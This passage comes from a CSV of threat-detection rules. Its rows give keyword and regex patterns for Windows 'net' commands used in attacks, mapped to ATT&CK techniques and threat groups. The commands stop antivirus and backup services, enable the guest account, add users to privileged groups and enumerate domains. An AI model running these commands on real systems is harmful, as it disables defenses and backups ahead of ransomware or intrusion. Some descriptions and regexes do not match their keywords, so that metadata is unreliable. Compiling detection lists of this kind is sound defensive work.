tmlisten*",".{0,1000}net\sstop\stmlisten.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop TrueKey*",".{0,1000}net\sstop\sTrueKey.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop TrueKeyScheduler* ",".{0,1000}net\sstop\sTrueKeyScheduler.{0,1000}\s\s\s\s","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop TrueKeyServiceHel",".{0,1000}net\sstop\sTrueKeyServiceHel","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - 
Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop vapiendpoint* ",".{0,1000}net\sstop\svapiendpoint.{0,1000}\s\s\s\s\s\s\s","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop VeeamBackupSvc*",".{0,1000}net\sstop\sVeeamBackupSvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop VeeamBrokerSvc 
*",".{0,1000}net\sstop\sVeeamBrokerSvc\s.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop VeeamCatalogSvc*",".{0,1000}net\sstop\sVeeamCatalogSvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop VeeamCloudSvc*",".{0,1000}net\sstop\sVeeamCloudSvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop VeeamDeploymentService*",".{0,1000}net\sstop\sVeeamDeploymentService.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop VeeamDeploySvc*",".{0,1000}net\sstop\sVeeamDeploySvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop VeeamDeploySvc* ",".{0,1000}net\sstop\sVeeamDeploySvc.{0,1000}\s\s\s\s","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat 
Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop VeeamEnterpriseManagerSvc*",".{0,1000}net\sstop\sVeeamEnterpriseManagerSvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop VeeamHvIntegrationSvc*",".{0,1000}net\sstop\sVeeamHvIntegrationSvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net 
stop VeeamMountSvc*",".{0,1000}net\sstop\sVeeamMountSvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop VeeamNFSSvc*",".{0,1000}net\sstop\sVeeamNFSSvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop VeeamRESTSvc*",".{0,1000}net\sstop\sVeeamRESTSvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop VeeamTransportSvc*",".{0,1000}net\sstop\sVeeamTransportSvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop vsnapvss*",".{0,1000}net\sstop\svsnapvss.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop vssvc*",".{0,1000}net\sstop\svssvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - 
Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop wbengine*",".{0,1000}net\sstop\swbengine.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop wbengine*",".{0,1000}net\sstop\swbengine.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop WinDefend*",".{0,1000}net\sstop\sWinDefend.{0,1000}","greyware_tool_keyword","net","stop critical 
services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop WinDefend*",".{0,1000}net\sstop\sWinDefend.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop WRSVC*",".{0,1000}net\sstop\sWRSVC.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net user *$* /*",".{0,1000}net\suser\s.{0,1000}\$.{0,1000}\s\/.{0,1000}","greyware_tool_keyword","net","manipulation of a hidden local account with the net 
command","T1564 - T1078 - T1136.001","TA0003 - TA0004","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*NET USER GUEST /ACTIVE:YES*",".{0,1000}NET\sUSER\sGUEST\s\/ACTIVE\:YES.{0,1000}","greyware_tool_keyword","net","activate the guest account in Windows","T1078 - T1087.001 - T1136.001","TA0006 - TA0007 - TA0003","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Persistence","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net view /all /domain*",".{0,1000}net\sview\s\/all\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net view /domain*",".{0,1000}net\sview\s\/all\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - 
menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","https://github.com/alperenugurlu/AD_Enumeration_Hunt/blob/alperen_ugurlu_hack/AD_Enumeration_Hunt.ps1","1","0","N/A","N/A","10","1","92","20","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z" "*net view \\* /all*",".{0,1000}net\sview\s\\\\.{0,1000}\s\/all.{0,1000}","greyware_tool_keyword","net","retrieves a list of shared resources on a remote machine","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*net* group Administrator* /add /domain*",".{0,1000}net.{0,1000}\sgroup\sAdministrator.{0,1000}\s\/add\s\/domain.{0,1000}","greyware_tool_keyword","net","adding a user to a privileged group. 
This action can be used by adversaries to maintain unauthorized access or escalate privileges within the targeted environment.","T1098","TA0003","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Persistence","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*net.exe localgroup ""Remote Desktop Users"" * /add*",".{0,1000}net\.exe\slocalgroup\s\""Remote\sDesktop\sUsers\""\s.{0,1000}\s\/add.{0,1000}","greyware_tool_keyword","net","Adds a user account to the local Remote Desktop Users group","T1035 - T1078 - T1087","TA0003 ","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Persistence","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*net.exe localgroup *Backup Operators*",".{0,1000}net\.exe\slocalgroup\s.{0,1000}Backup\sOperators.{0,1000}","greyware_tool_keyword","net","discover local admins group","T1069.001 - T1087.002","TA0007 - TA0004","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Persistence","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*net.exe"" localgroup *Backup 
Operators*",".{0,1000}net\.exe\""\slocalgroup\s.{0,1000}Backup\sOperators.{0,1000}","greyware_tool_keyword","net","discover local admins group","T1069.001 - T1087.002","TA0007 - TA0004","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Persistence","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*net.exe* group *Account Operators* /domain*",".{0,1000}net\.exe.{0,1000}\sgroup\s.{0,1000}Account\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net.exe* group *Backup Operators* /domain*",".{0,1000}net\.exe.{0,1000}\sgroup\s.{0,1000}Backup\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net.exe* group *Domain Computers* 
/domain*",".{0,1000}net\.exe.{0,1000}\sgroup\s.{0,1000}Domain\sComputers.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net.exe* group *Domain Controllers* /domain*",".{0,1000}net\.exe.{0,1000}\sgroup\s.{0,1000}Domain\sControllers.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net.exe* group *Enterprise Admins* /domain*",".{0,1000}net\.exe.{0,1000}\sgroup\s.{0,1000}Enterprise\sAdmins.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - 